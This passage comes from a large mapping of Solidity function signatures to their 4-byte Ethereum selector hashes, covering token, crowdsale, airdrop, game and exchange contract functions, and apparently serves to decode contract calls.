"0x674c85a7", "mmul(uint128,uint128)": "0x7865f463", "msub(uint128,uint128)": "0xbba80923", "madd(uint128,uint128)": "0xc45982b9", "reading_card_count()": "0xa0a95502", "addReferralHashrate(address,uint256)": "0x7bb3ca86", "Banglatoken()": "0x2df939cd", "GTTAirdrop(address,address)": "0xc4d2783c", "BBNToken()": "0x50eb2d02", "processFunding(address,address,uint256,uint256)": "0x26b41613", "Zorro02Token()": "0x3b393b03", "BenefyCashToken(string,string,uint8,uint256)": "0xbc69dc89", "DEMOHASHTOKEN(uint256,string,uint8,string)": "0x8b6df6bf", "changeWelcome(string)": "0x3bc273b0", "ETHERCToken()": "0xdae8865c", "createCrowdsale(uint256,uint256,uint256,uint256,address,address,address)": "0xcc92ebad", "BOOCOIN()": "0xbc0cd8d3", "ETH750on54()": "0xb348ddde", "createContractTot(string)": "0xd2e0637b", "BloodToken()": "0xc2db8676", "Multiplexor()": "0x9b5d8e63", "TRAToken(address)": "0x2af52312", "WillTestament()": "0x136ac4bf", "ArbaCoin(uint256,string,string)": "0x49c3567c", "ExtrabitToken()": "0x1f368fa6", "HGSOCIAL(uint256,string,string)": "0x262f8244", "checkIfAddressIsWhiteListed(address)": "0xc0a7639e", "removeMultipleAddressesFromWhitelist(address[])": "0x06c8ffed", "removeSingleAddressFromWhitelist(address)": "0x5d61dd5a", "addMultipleAddressesToWhitelist(address[])": "0xe30f4e2b", "addSingleAddressToWhitelist(address)": "0x7acc6f74", "changeMinAmount(uint256)": "0xe34ffcb8", "minAmount()": "0x9b2cb5d8", "transferTech(address)": "0x6170a23e", "EthereumStack()": "0x05dd7303", "AUSBToken()": "0x621de5ac", "xioniCoin()": "0x13037d22", "POOL_EDIT_3()": "0x087ccebe", "maybeAnotherTime(uint256)": "0xded37745", "balancewof()": "0x80e339fc", "auto_transfect(address[])": "0x1c92cab2", "BurnTokens(address,uint256,string)": "0x254dacba", "MoveTokens(address,address,uint256,string)": "0xbb33e730", "notesOf(address)": "0xd59aec08", "lockedtokensOf(address)": "0x44dc028d", "UnLockTokens(address,uint256,string)": "0x145ca0b3", "LockTokens(address,uint256,string)": "0x691bf023", "transferSuperuser(address)": "0x57c393fa", "isSuperuser(address)": "0xbceee05e", "HonestHeart()": "0xb695ecfd", "updateSeller(address)": "0xdbbdae63", "authAccess()": "0x7a6b1c7c", "FirstToken()": "0xe420a904", "BlockcloudToken()": "0x236be3e2", "EEAcoin(address)": "0xdb5370c3", "BariCoin()": "0x70e9a612", "MithrilDemo()": "0x6f025c84", "substract(uint256,uint256)": "0x5d4e1e5c", "addition(uint256,uint256)": "0x54f363a3", "HitToken(string,string,uint8,uint256,address,address,address)": "0x854c2e1e", "CoinNext()": "0xbd778fde", "ZZCoin(address)": "0x9e4902c9", "unitTestModifyStaker(uint256,uint256)": "0x61f8e91a", "unitTestGetAvailableReward(uint256,uint256)": "0xf4f5b30f", "unitTestSetRewardLevels()": "0x09f30eac", "NANI(address)": "0xdfa38fea", "Bodcoin()": "0xa7f17bd5", "add_certifications(string,string)": "0xf6454620", "addPolicy(bytes32,uint32,uint32,uint256,string)": "0xffeddd49", "stakeTokensManually(address,uint256,uint256)": "0x32418558", "unstakeTokensManually(address)": "0x78d5e123", "claimRewardManually(address)": "0x4cbc49ad", "transferOtherTokens(address)": "0xf56585de", "transferSKM()": "0xd93761fb", "unstakeTokens()": "0xa5ce413b", "getStakerInfo(address)": "0x733bdef0", "getAvailableReward(address)": "0x46a1cd08", "modifyStakerLimit(uint256)": "0x0f86abc1", "setRewardLevel(uint256,uint256,uint256,uint256[],uint256[])": "0xa63d6f05", "setRewardWallet(address)": "0x5958621e", "transfer(address[],address,uint256[])": "0x9600ec92", "MyToken30(uint256,string,string)": "0x04b94ec5", "getVotes(uint32)": "0x9bb192fd", "getCandidate(uint32)": "0x2abe5a2d", "candidatesCount()": "0x2d35a8a2", "WithdrawDeposit(uint256)": "0xe7477f1c", "fixedDeposit(uint256)": "0x4bae6659", "getOneTotalFeesDistributed(uint256)": "0xd1cbfc66", "getTotalFeesDistributedCount()": "0x38d1ed57", "getOneTotalFeesCollected(uint256)": "0xc46ce53e", "getTotalFeesCollectedCount()": "0x68e76403", "getATokenHolder(uint256)": "0xed9f4010", "getTokenHoldersCount()": "0x468f3dcd", "setDocToAddress(address,bytes)": "0x560667f1", "getStorageAddress()": "0x393a4d34", "transfertCopieExecutoire(bytes32)": "0x801a115d", "acknowledgeCopieExecutoire(bytes32)": "0x73c6a4ec", "verifyCopieExecutoire(bytes32)": "0x136ede68", "mintCopieExecutoire(bytes32)": "0xd59070f8", "updateBanqueAddress(address)": "0x2b49c9c2", "updateNotaireAddress(address)": "0xc6585a27", "plantToken()": "0x0862fdf3", "makeGrant(address,uint256,uint256,uint256,uint8)": "0xd7988c98", "releaseAngelVested()": "0x10422c24", "releaseAngelFirstVested()": "0x6600d282", "YOUToken()": "0x8e77304c", "claimable()": "0xaf38d757", "initialize(address,uint256,uint256,uint256,uint256,address)": "0x5df5f96f", "RTCCOINTOKEN(uint256,string,string)": "0x554803c7", "medibitToken()": "0xbb8d35ce", "setContributionDates(uint64,uint64)": "0x587c2b8e", "setwalletOne(address)": "0xba41dc5b", "medibitICO(address)": "0xab9b8637", "SuperTicketCoin(uint256,string,string)": "0x121114e1", "__tokenAndWalletBalancesMatch__(address,address,address)": "0x8191b9a2", "__signatureIsValid__(address,bytes32,uint8,bytes32,bytes32)": "0x1d981758", "__min__(uint256,uint256)": "0xa16249e2", "__max__(uint256,uint256)": "0xedd0d90d", "__generateOrderHashes__(address[4],uint256[8])": "0x4d37ec46", "__flooredLog10__(uint256)": "0x84f1b0b8", "__executeOrderInputIsValid__(address[4],uint256[8],address,address)": "0x5c16e323", "walletWithdrawal(address,uint256,uint256)": "0x57b394bf", "walletDeposit(address,uint256,uint256)": "0xcfbe2cb3", "setOrderBookAcount(address)": "0x4a8ef4bd", "setMinOrderEthAmount(uint256)": "0xe7cf514d", "setEidooWallet(address)": "0x1d2627bb", "setEdoRate(uint256)": "0x8e5919b6", "Exchange(address,uint256,address,uint256,uint256,address)": "0x388415e5", "verifyOrder(address,uint256,uint256,address)": "0x4e7343ea", "updateLogic(uint256)": "0xd767ee4d", "updateExchange(address)": "0x648a0c91", "updateBalance(address,uint256,bool)": "0x41228803", "depositERC20Token(address,uint256)": "0x2039d9fd", "getLogic(uint256)": "0xd526d332", "removeLogicVersion(uint256)": "0xdfa4591c", "addLogicVersion(uint256,address)": "0xa7096ac8", "WalletConnector(uint256,address)": "0x4804e2a5", "ESIT()": "0xf5529d3f", "amounRefferalWon()": "0x942dac28", "allowManuallyBurnTokens()": "0x30762e2e", "privateWeiRaised()": "0x47a8205f", "threeHotHoursPriceOfTokenInWei()": "0x51602590", "requiredExpIncreaseFactor()": "0x12d1456f", "endFreeGet()": "0x9e340ffb", "FST()": "0x202920ef", "getOwnerServer()": "0xf3cee129", "_myLuckyNumber()": "0x45e29057", "divAmt()": "0x2d83f5a3", "increasePrice_20_January()": "0xe74ab046", "sixthExtendedBonusSalesEnds()": "0x7ac94409", "erc20TokensContractAddress()": "0x17fccb47", "blocksPerPayPeriod()": "0xe222b00c", "votersLength()": "0x6c6c39fb", "isIQTDistributed()": "0xeffa00a6", "tokenAssignmentControl()": "0xc8c2ed54", "listingDate()": "0x141c9422", "ILFManagerCandidateKeyHash()": "0x97e1e9b5", "totalExtraTokens()": "0x791af8e4", "lastInitializedRound()": "0x8807f36e", "freezed()": "0xb7540d9f", "firstTime()": "0x41d76a9c", "currentSyndicateValue()": "0xcdf20e1e", "RESERVE_POOL_ADDR()": "0x2d6acb3a", "maximumSubscription()": "0xf8a35b35", "hardCapLow()": "0x5c071492", "addrAdmin()": "0xbfae2f0e", "INITIAL_AC_SUPPLY()": "0x2b193ac4", "AllowTransferGlobal()": "0x2c995e1b", "isPreIcoStage()": "0xf9e8ad7c", "DEFAULT_CREATION_LIMIT()": "0x9520a06f", "TRCExchangeRate()": "0xcaa3d559", "MAX_TOKENS_ADVISORS()": "0x7a5977be", "outstandingQuarters()": "0x52812053", "giveEthJackpotAddress()": "0x18b2739d", "hivePerEther()": "0xd22b32e9", "CROSAIR_SHIP_LIMIT()": "0xaa59b024", "peMaxPerPerson()": "0x3cdd9262", "decimals_()": "0xf785ef72", "foundationTokenHolder()": "0xf58e2327", "MIN_FUND()": "0x55b2bb0f", "MediatedTransactions_TransactionHeight()": "0x9bc33b8a", "PUBLIC_TOKENS()": "0xf3a04af4", "kgtToken()": "0x0bc5f216", "MAX_YAYS()": "0x362344b8", "manual()": "0x226e2d10", "chefPrice()": "0x744a8f77", "getPlayerPortfolio()": "0x23e4d669", "dedeNetworkAddress()": "0xc440e875", "minAcceptEther()": "0x486c182c", "ETHER_CAP()": "0xe8303659", "euroRaisedICO()": "0xbc10a667", "lockThreshold()": "0x708b9d01", "DTR()": "0xe89f0f40", "minBankerEther()": "0x76c158cf", "travelUnitFee()": "0x57c1a709", "AUTHOR()": "0xa7be85c6", "NFTAddress()": "0x310c87cc", "ITO_TOKENS_PERCENT()": "0x387e01fd", "airdropTime()": "0xc403f90f", "lps()": "0xe0818669", "codeUpdateState()": "0x79a958c2", "flowerContract()": "0xe1a58a74", "clockpos()": "0xbc6f1699", "tempAdvisorsTeam()": "0xd9b6b197", "buyerCapHighEther()": "0xbe25d0ce", "CROWD_WEEK2_BONUS()": "0xda8a01a5", "lastCalculatedToken()": "0x4f2af869", "gcSupply()": "0x0be0713d", "curOpenBNumber()": "0x06886a53", "FUND_GATHERING_TIME()": "0x7a314ce2", "teamAddressThreeTokens()": "0x0b480095", "tokensPerEther_denominator()": "0x899b64d9", "angels_lock_days()": "0x069c97df", "POHStartTime()": "0x51f1fa97", "oraclizeTimeTolerance()": "0x5cf6208a", "stageThreeSupply()": "0x4d5de6ba", "gamblers()": "0xdfe6d366", "feesB()": "0x21abf58b", "TADPOLE_BOOST()": "0xacda6737", "wallet10()": "0x5f88ffed", "whitelisting()": "0x520c5828", "waveCap1()": "0xe66a5e6b", "lockInTime2()": "0x9ff1b56f", "productsExported()": "0x22137935", "takeToken()": "0x1ecfd4c3", "tokenRatePre()": "0x4cc09eac", "randomFight2DeathContract()": "0x8e416b9b", "publicSaleSupply()": "0xcbfd14a2", "LOCKED_ADDRESS()": "0x55532953", "privateIcoFinalized()": "0xbd2c245e", "totalContributedAmount()": "0x44c4dc31", "backWindowAdjustmentRatio()": "0xa278ce66", "requestEndCall()": "0x5f54a1c7", "lightpool()": "0x31047973", "roger()": "0x381d5441", "GetStats()": "0x07298203", "tradeAddress()": "0x49daca7a", "needApprovesToConfirm()": "0x739ab361", "ConversionRates(address)": "0xca68968e", "decodeTokenImbalanceData(uint256)": "0x4c0ddea8", "getAlerters()": "0x7c423f54", "getOperators()": "0x27a099d8", "calcSrcQty(uint256,uint256,uint256,uint256)": "0xda6585ff", "calcDstQty(uint256,uint256,uint256,uint256)": "0xa35f9514", "SortCompetitionScores(uint32)": "0xffef2b00", "ChangeOwner(address)": "0xf2853292", "GetProfitFunds()": "0xec35576e", "ChangeDatabase(address)": "0xebc04649", "RemoveRocketForSale(uint32)": "0xe2034834", "GetCompetitionResults(uint32,bool)": "0xe1909035", "GetInventoryCount(address)": "0xdbcf194a", "GetRocket(uint32)": "0xdaf017a9", "m_Owner()": "0xca75d770", "GetRocketStock(uint16)": "0xc959ec57", "BuyStockRocket(uint16,address)": "0xc6cc68b9", "GetInventory(address,uint256)": "0xc55f3b4c", "GetAuction(uint32)": "0xc022abbe", "m_GameHidden()": "0xbdaeb0a0", "GetCompetitionFunds(uint32)": "0xbd7095db", "AddRocket(uint32,uint64,uint32,uint32,uint32,uint32,uint32,uint32,uint32,uint32,uint64,uint32)": "0xae68c80a", "m_Paused()": "0xa7565888", "BuyRocketForSale(uint32)": "0x9d442102", "GetCompetitionInfo(uint32)": "0x99c75517", "PlaceRocketForSale(uint32,uint80)": "0x9875958c", "m_Database()": "0x91bb4816", "StartCompetition(uint8,uint8,uint8,uint8,uint80,uint32)": "0x8cd41fae", "SetDebugExtra(uint32,uint8)": "0x8c5f6d5a", "Unpause()": "0x7805862f", "WithdrawWinnings(uint256)": "0x74f760e4", "FinishCompetition(uint32)": "0x734f2838", "Pause()": "0x6985a022", "GetWithdrawalFunds(address)": "0x3285f406", "ChangeGameHidden(address)": "0x2b8a789b", "GiveReferralRocket(uint16,address)": "0x258f6b8f", "LaunchRocket(uint32,uint32,uint32,uint32,uint32,uint32)": "0x1f15e163", "IsPaused()": "0x1309a563", "WithdrawProfitFunds(uint256,address)": "0x0dccfde4", "AddMessage(address,uint256,string)": "0x4c2f04a4", "guessPassword(address,uint256,bool)": "0x954290f4", "upgradeCar(uint32,uint8)": "0xfd99c6a4", "addCarProduct(string,uint32,uint32,uint32,uint32,uint32,uint256,uint256)": "0xea05cd01", "getCarEarning(uint32)": "0xe78ce8db", "newCarProductID()": "0xe3ea6496", "getPlayerBalance(address)": "0xe2734c93", "addAuction(uint32,uint256,uint256,uint256)": "0xdf1cf293", "getCarProduct(uint32)": "0xdde6e256", "buyCar(uint32)": "0xcc50dacb", "getCarProductEarning(uint32)": "0xc9f3d62e", "getCarProductCount()": "0xc99c3c62", "Master()": "0xb67f8b6d", "cashOutCar(uint32)": "0xb2bec979", "_transferAction(uint32,address,uint8)": "0xafe007b6", "getCarDetails(uint32)": "0xae94bbf1", "addCarInit(address,uint32,uint32,uint32,uint64)": "0xa5a01bc7", "levelUpCar(uint32,uint32,uint32)": "0x865ad6c2", "_transfer(uint32,address)": "0x83773de8", "newAuctionID()": "0x834e476f", "getCarProductName(uint32)": "0x79f015b2", "setUpgradeAddress(address)": "0x66f9c99e", "cashOut(uint256)": "0x5c7b79f5", "getCarProductCurrentPrice(uint32)": "0x538fb98c", "bid(uint32)": "0x51ffcab3", "getCarOwner(uint32)": "0x39c98a1b", "getCarAuctionID(uint32)": "0x361d292e", "getCarSelling(uint32)": "0x344d1ef2", "upgradePrice()": "0x287ad39f", "cancelAuction(uint32)": "0x27eac914", "getCarCount()": "0x27436b59", "getCarCurrentPriceAuction(uint32)": "0x1d2fd267", "CompleteInit()": "0x1a1b8d08", "newCarID()": "0x154d7944", "endSaleCarProduct(uint32)": "0x10342d02", "setFreeze()": "0x2c8cbe40", "numMarketMakers()": "0xdc06b859", "numAccounts()": "0x8ce25a93", "developerReserve()": "0xf55c9f60", "underwriter()": "0xf00db260", "expiredCount()": "0xeda70f7e", "setToken(address,uint256,address)": "0xe6c52016", "secretBidCount()": "0xdd79cc6a", "houseKeep()": "0xda00586b", "secretBids(address)": "0xc8c89fa5", "expireBid(address)": "0xc6ad5d7c", "strikePrice()": "0xc52987cf", "haraKiri()": "0xc4052559", "saleEnd()": "0xc10b9358", "executedCount()": "0xbacd2e97", "executeBidFor(address,uint256,uint256,uint256)": "0xa7e86daa", "setStrikePrice(uint256,uint256)": "0x8d52a1fc", "developerPctX10K()": "0x8042b215", "strikePricePctX10()": "0x6797b106", "tune(uint256,uint256)": "0x61f17532", "proceeds()": "0x55b5ec64", "auctionStart()": "0x4f245ef7", "doDeveloperGrant()": "0x4c182a95", "payUnderwriter()": "0x4bd9d76c", "saleDuration()": "0x3711d9fb", "decimalMultiplier()": "0x3082538f", "SendDataToken(uint256,string,uint8,string)": "0xcbd6cc67", "MrwToken()": "0x04d58b3f", "SpriteToken()": "0x1fe7ff2c", "uint256ToBytes(uint256)": "0xc7559da4", "bytesToBytes4(bytes,uint256)": "0xcbd85c76", "parseData(bytes,uint256)": "0x1d790c99", "resetChallenge(uint256)": "0xbe0ca01b", "sliceBytes32Arr(bytes32[],bytes32,uint256,uint256)": "0x055c7c96", "submitCustodianDoubleSign(address,uint256,bytes32[],uint256[],bytes32[])": "0x96b6af5a", "challengeWithPastCustody(address,uint256,bytes32[],uint256[],bytes32[])": "0x24241ebc", "initiateChallengeWithPastCustody(address,uint256,bytes32[],uint256[],bytes32[])": "0x6d08e8f9", "challengeWithFutureCustody(address,uint256,bytes32[],uint256[],bytes32[])": "0xd7de57c6", "claimStake(uint256)": "0x44c7d6ef", "withdraw(address,uint256,bytes32[],uint256[],bytes32[],uint256)": "0x59c8969e", "finalizeStake()": "0x2310b384", "setCustodianForeign(address)": "0xfb9efcf0", "SetupFuseaNetwork(string,string,uint256,uint256,uint256,address,address)": "0x1b4a93aa", "FuseaNetwork()": "0x12fdf767", "withdrawForTokens(address)": "0x54147ecb", "MindHacker()": "0xf443ea83", "AmountBonusPricing(uint256[])": "0xddc0db14", "TimeBonusPricing(uint256[])": "0x5d80effc", "getCurrentAmountBonusRate(uint256)": "0xaacaa602", "getCurrentTimeBonusRate()": "0x578ee866", "HashtagToken(uint256)": "0xcb0a2d95", "Greedy()": "0x53dc4cf1", "multiTransfer(address[],address[],uint256[])": "0xcd72250d", "removeFromTokenList(address,uint256)": "0x4afbac9c", "Bemo()": "0x3f28b20e", "CheetahCoin()": "0xe717db5c", "THANKSTEST4()": "0xf66f2449", "createLockTokenHistory(address,uint256)": "0x14a091a9", "activateUser(address,address)": "0x9013ad18", "mintOwner(uint256)": "0x33f88d22", "set_devContract(address)": "0x1177645b", "EITToken()": "0xe14b238a", "addAdmin(address,bool)": "0xa4230bd5", "withdrawTokenRefund(uint256,address)": "0xcee749bc", "refundTokenPayment(uint256,address,string,uint256,address)": "0x9600f294", "payForOrderInTokens(uint256,address,uint256,address,uint256)": "0x9da30467", "acceptTokenPayment(address,uint256,address,uint256)": "0xcc4fbc43", "TokenDemo(string,string,uint8,uint256)": "0x3491a19d", "DreamCoin(uint256,string,string)": "0xb74f010f", "mineMany(address[],uint8[],bytes32[],bytes32[])": "0x0e3a23db", "mineForMany(address[],address[],uint8[],bytes32[],bytes32[])": "0xe1db8ff2", "mine(address,uint8,bytes32,bytes32)": "0x65c5e683", "mineFor(address,address,uint8,bytes32,bytes32)": "0x63bf8194", "SaferEcRecover()": "0xb9c390aa", "mineMany(bytes32[])": "0x1d7f8039", "mineForMany(address[],bytes32[])": "0xd448273c", "mine(bytes32)": "0x2fdc505e", "mineFor(address,bytes32)": "0xadf13281", "PowTokenHashedBase()": "0xdad38294", "mine_success(bytes32)": "0xb516444a", "PowTokenBase()": "0xb8ffd64b", "_transfer_internal(address,address,uint256,bool,bytes)": "0x5bfbbe39", "ERC20TokenImpl()": "0x2af6fb10", "BitcoinXChainToken()": "0x7d363718", "myFirstToken()": "0x1edf49ff", "updateReferral(address,uint256)": "0xd3cde1a5", "checkReferral(address)": "0x0c19f80e", "checkInvestments(address)": "0x835c1154", "checkWithdrawals(address)": "0x9d9fcc72", "getTokenPrice(address,address)": "0xafa99860", "getTokenRemain()": "0x66f0a3f6", "validateAmount(uint256)": "0xc3c563f4", "getUSDAmount(uint256)": "0x9541bc41", "isBountyPayStage()": "0x2429ee2a", "createLockTokenHistory(address,uint256,uint256)": "0x7d4f128b", "updateBuyType(address,address,int256)": "0xde3b5061", "blockUser(address,address)": "0xe5bb6575", "register(address,address,address)": "0xf3201424", "updateETHPrice(uint256)": "0x924bb1d0", "greedIsGood(address,uint256)": "0x76f9e018", "InServiceToken()": "0xfa13af97", "diff(uint256,uint256)": "0x8f5e514a", "submitAnswer(uint256[],uint256[])": "0x4de1fc55", "get_vice_pic(uint8)": "0xbddbe244", "get_candidate_pic(uint8)": "0xdc0f5ffc", "insert_candidate(string,uint8,string,string,string,string)": "0x354f6398", "setTiers(bytes32[],uint256[],uint256[],uint256[],uint256[],uint256[],bool[],bool[])": "0xe55a07b6", "getBonusRateForAmountBased(uint256)": "0x11715c94", "setAmountBasedBonus(uint256[],uint256[],uint256[])": "0xcbce2fcf", "setUseAmountBasedBonus(bool)": "0x043996c2", "getBonusRateForTimeBased()": "0xc4d4fdc0", "setTimeBasedBonus(uint256[],uint256[],uint256[])": "0x61e3f0a4", "setUseTimeBasedBonus(bool)": "0x2fdde1d4", "removeAddressesFromBonuslist(address[])": "0x1d4c8e5d", "removeAddressFromBonuslist(address)": "0xd81c6741", "addAddressesToBonuslist(address[])": "0x06026d87", "Bonuslist(address)": "0xe885b81f", "addAddressToBonuslist(address)": "0xf489faf9", "removeAddressesFromWhitelist(uint256,address[])": "0x1183429a", "removeAddressFromWhitelist(uint256,address)": "0xd65c0035", "addAddressesToWhitelist(uint256,address[])": "0xe45dbabd", "whitelist(uint256,address)": "0x4b25bfce", "addAddressToWhitelist(uint256,address)": "0x413f50da", "CD(uint256,string,uint8,string)": "0xb4612d78", "MYGREATTOKEN()": "0x80667509", "setPublicSaleParams(uint256,uint256,uint256,uint256)": "0x8e8f1e84", "paymentDisable()": "0xba353925", "paymentEnable()": "0x6a92fcf6", "shiggidyToken()": "0xd7b0a358", "doAirdrop(address,address[],uint256[])": "0x2f1afbac", "mint(address,string,string,uint256,uint64,uint64,uint64)": "0xcdf46344", "updateTokenName(uint256,string)": "0x67ca2298", "YuChainToken()": "0xf5c60309", "startMinting(bool)": "0xb2d37165", "getAllowedAmountAndPendingPeriods(address,address,bytes32)": "0x48900438", "cancelRecurringPayment(address)": "0x461998fc", "getAvailableAmountWithdrawal(address,bytes32)": "0x980b5335", "getAmountWithdrawal(address,bytes32)": "0xc4290b76", "CocacolaToken()": "0x9b85bc85", "getPeriodsWithdrawal(address,bytes32)": "0x8e69e204", "getSetup(address,bytes32)": "0x519a1a41", "createSetup(address,uint256,uint256,bool,address,uint256)": "0x2bbe62d6", "LOL6()": "0x0c5241fa", "GudTesteContratoF()": "0x62f57ff6", "Ownedfunction()": "0x37d2649a", "setCrowdsaleStartandDuration(uint256,uint256)": "0xf3a1b4b2", "whitelistMulti(address[],uint256[],uint256[])": "0xac2e043d", "TIME_UPDATE(bytes32)": "0xddf4b011", "ngrzicoToken()": "0x204605ad", "ChrizzxToken()": "0x56411a0f", "verifyTx(uint256[2],uint256[2],uint256[2][2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2])": "0xfe01ff62", "TRCToken()": "0x3d1b9d00", "uraniumplusToken()": "0xb1d0fbc5", "EITARD()": "0x131b0563", "payBalance()": "0xd5503d5f", "walletBalance()": "0xcd0a314b", "deleteTransaction(uint256)": "0x00e9c006", "signTransaction(uint256)": "0x5d9ec210", "getBalanceOfInstance()": "0xd7e0e776", "great(uint256)": "0xa954c209", "SocialPay()": "0x351adcb0", "JoannaToken()": "0x0917f827", "fabricoin()": "0x99434669", "LMAOtoken()": "0x7e1721ee", "getemployee(address)": "0xa6572c87", "setemployee(address,string,uint256)": "0xe0fddf81", "EMGwithdraw(uint256)": "0x929a3c18", "setGenesis(address)": "0xeb14b353", "setFWDaddrETH(address)": "0x6c99b0da", "YukiChainToken()": "0xa6c0d5a8", "novaluetoken(uint256,string,string)": "0x4b932327", "setOwnerExt()": "0xa8d4ee0f", "getRet()": "0xc37e74c7", "changeOwnerToZero()": "0x0ce10cbd", "NickSterBate()": "0x3bca915f", "batch(address[],uint256)": "0x93331892", "ERC20PreICO(address)": "0x75e8f757", "setABalances(address[],uint256[])": "0x9269c0a7", "setABalance(address,uint256)": "0x41f2ce14", "setIBalance5(uint256,uint256,uint256)": "0x5fdba1de", "setIBalance4(uint256,uint256,uint256)": "0xbea4c4ee", "setIBalance3(uint256,uint256,uint256)": "0x549737e3", "setIBalances2(uint256[],uint256[])": "0xdc3a1cad", "setIBalances(uint256[],uint256[])": "0xa367e565", "setIBalance(uint256,uint256)": "0x4b7863fe", "computeAirdrop(address)": "0x436e1e2e", "doAirdrop(address)": "0x73251628", "adminClaimAirdropMultiple(address[])": "0xf0e7cf13", "adminClaimAirdrop(address)": "0xad9df055", "claimAirdrop()": "0x5b88349d", "ownerClawback()": "0xb63e93dc", "setAdminWallet(address)": "0x35082933", "CrowdForceTestToken()": "0xc458e5f3", "transferInternal(address,address,uint256,bytes,bool,string)": "0x8252e391", "transferInternal(address,address,uint256,bytes)": "0x936cfb0e", "AxpireToken()": "0x2114fd0f", "setLoading(uint256)": "0x8129519d", "setBasePremium(uint256)": "0x1179778b", "getCoefficient(bytes2,uint256)": "0xf0ad243e", "getIntervalCoefficientMultiplier(uint256,uint256,uint256)": "0xa52a0f8e", "getCoefficientMultiplier(string,string,string)": "0x947fd341", "initialize(uint256,uint256)": "0xe4a30116", "isClaimable()": "0x74478bb3", "calculatePremium(uint256,uint256,uint256,string,string,string)": "0x834eebe8", "TheMutualCurrency()": "0x1fb4d1e7", "handlePayment(address)": "0x41bb26d3", "PayMain(address)": "0xa8c12d7c", "MyCurrency()": "0x23bda0ee", "TSFINAL()": "0xb512f98c", "IcoTokenMock()": "0xef3c64a8", "setChickenHunt(address)": "0xf9eab09f", "totalChicken()": "0xc3ba65e7", "setupToken(address,address,address)": "0xca48b0be", "FoundToken()": "0x3ff0a1e5", "BotTradesToken()": "0xbbb92642", "refundSale()": "0x69a1bca9", "discountCollect()": "0x7120fab4", "discountSum(uint256)": "0xd77ac32d", "setIEOAddress(uint256,address)": "0xb097c984", "bullcrapToken()": "0x56e97617", "getDiscount()": "0xd137874b", "isNumBlack(uint8)": "0x9cef9cfe", "isNumRed(uint8)": "0x9f334696", "claimBets()": "0x68283f4d", "hasActiveBet()": "0x2221fb3e", "clearBets()": "0x8f08288a", "getOrderHash(address,uint256,address,uint256,uint256,uint256,address)": "0xc4e29e66", "calculateTakerFee(address,uint256)": "0xa2190b46", "validateTrade(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32,uint256,address)": "0xcb3cb085", "getAccountFeeModifiers(address)": "0xe7b808ea", "ETHERCExchange()": "0x3a5860c4", "tradeEventHandler(address,uint256,address,uint256,address,address,bytes32,uint256)": "0xee0c3e02", "CapCoinInternational()": "0xa2d6a926", "reapFarm(address,address)": "0x2bff4b66", "pepFarm(address,address,address,address,uint256)": "0x6ac6016f", "AcuteEthereumCloudMiningunion()": "0x7f6597e0", "NBACoin()": "0x6b178b90", "getCurrentStinkyLinkys()": "0x5164bb4d", "StinkyLinky()": "0xa70d7006", "setPosTokens(uint256)": "0xea9ae72e", "CosmoToken()": "0x117a0a22", "Eth2preNSP(uint256)": "0x1ee426e1", "Eth2USD(uint256)": "0x90bb5ad0", "GetTokenPriceCents()": "0xf3095511", "returnEth4Sender(uint256)": "0x9c67f2fb", "returnEth()": "0xe3f9ba0e", "releaseTokens4Sender(uint256)": "0xf182dd3b", "releaseETH()": "0x6639016b", "checkSoftCapOk()": "0xfaaf71e6", "setMvpExists(bool)": "0x9ab3a1fd", "getSendersEth(address)": "0xbcecbc65", "getSendersCalcTokens(address)": "0x65e0e117", "getSenders()": "0x128e0423", "onlyTestSetTimestamp(uint256)": "0xd4f0ca3f", "ShanHuCoin()": "0xe47bc32b", "transferAnyCaerusToken(address,uint256)": "0x5b3d386b", "markTokenSold(uint256)": "0xb889d440", "markContribution()": "0xdb11ead1", "spendToken(uint256)": "0xa2d74227", "createVestedToken(address,uint256,uint256,uint256,uint256)": "0x8ea91bf3", "markTransferTokens(address,uint256)": "0xd7f7f3aa", "setTransferAddress(address)": "0x185a5671", "CaerusToken(address,uint256)": "0xb0e24364", "calculateTokens(address,uint256)": "0xc31422ac", "removeExistingDiscount(address)": "0xfdf6393c", "calculateWeiNeeded(address,uint256)": "0x7807e826", "removeDiscount(address)": "0xfde1276a", "addDiscount(address,uint256,uint256)": "0xa5584456", "RateToken(uint256)": "0xcd103b4d", "ZAR_Omnidollar()": "0x28c0898b", "ATSXToken(address,address)": "0x92d519de", "SOLOBOT()": "0x81980c27", "OJCToken()": "0xb3e6c19f", "BidaCoin(uint256)": "0x028e10ac", "tarifOf(address)": "0x76105fe7", "myTarif()": "0x15e70102", "SevillavsBayern()": "0x7032d758", "QSBH()": "0x47021780", "FCoinToken()": "0x795c1713", "setPreAmounts(uint256,uint256)": "0xd34a280a", "setEthPreAmount(uint256)": "0x7f09bd1d", "setMtdPreAmount(uint256)": "0x3dab45b6", "setAmounts(uint256,uint256)": "0x983234b6", "setEthAmount(uint256)": "0xb87c7d43", "setMtdAmount(uint256)": "0x6993176a", "changeIssuer(address,bool)": "0xc1531ecc", "XclusiveCoin()": "0xc36e6fe5", "crowdsale(address,uint256)": "0x930c1198", "HPQToken(address)": "0xef76c060", "give(address[],uint256[])": "0xdf08ce62", "WidinShares()": "0x4c5879cf", "Khabayan()": "0x1df19259", "generateWinNumberTest(uint256,uint256,uint256,uint256,uint256)": "0xee52ecae", "generateWinNumber()": "0x30ce7b5d", "getWinNumbers(uint256)": "0x8cd85dc2", "getGuestNotes(address,address)": "0x9acd5e0e", "getGuestNotesInfo(bytes32)": "0x091ac806", "retrieve(bytes32,address)": "0x9e687b6c", "LOTTERY()": "0x494ac14c", "approveAndDo(address,uint256,address,bytes32,string)": "0x533e00ec", "ApproveAndDo(address,uint256,bytes32,string)": "0xa5d57bb7", "ELOT()": "0x2c1169ac", "giveTokens(uint256)": "0x54311422", "drainToken()": "0x70d66693", "drainWei()": "0xd3109af3", "setActiveWhitelist()": "0xfb09db11", "addWhitelist(address[])": "0xedac985b", "changeAddr(address)": "0x0e6c5f93", "changemincap(uint256)": "0x92b19872", "TIM6(uint256,string,uint8,string)": "0xb2d444df", "PlateMate()": "0xcbc44835", "STRUTToken()": "0xc531d52b", "FixedCeiling(uint256,uint256)": "0x8d6014a8", "relaxFundingCap(uint256,uint256)": "0xb12dff65", "isCrowdsaleFull(uint256,uint256)": "0xd0bc97d0", "weiAllowedToReceive(uint256,uint256,uint256,uint256)": "0xa04e34bc", "isCeilingStrategy()": "0x8dbe3be5", "setDesc(string)": "0x9614c769", "RBTToken()": "0x89b9572f", "setPurchasable(bool)": "0x76052df8", "getAirdrop()": "0xd25f82a0", "getDropAmount()": "0xf756b574", "setDropAmount(uint256)": "0xccbd8d25", 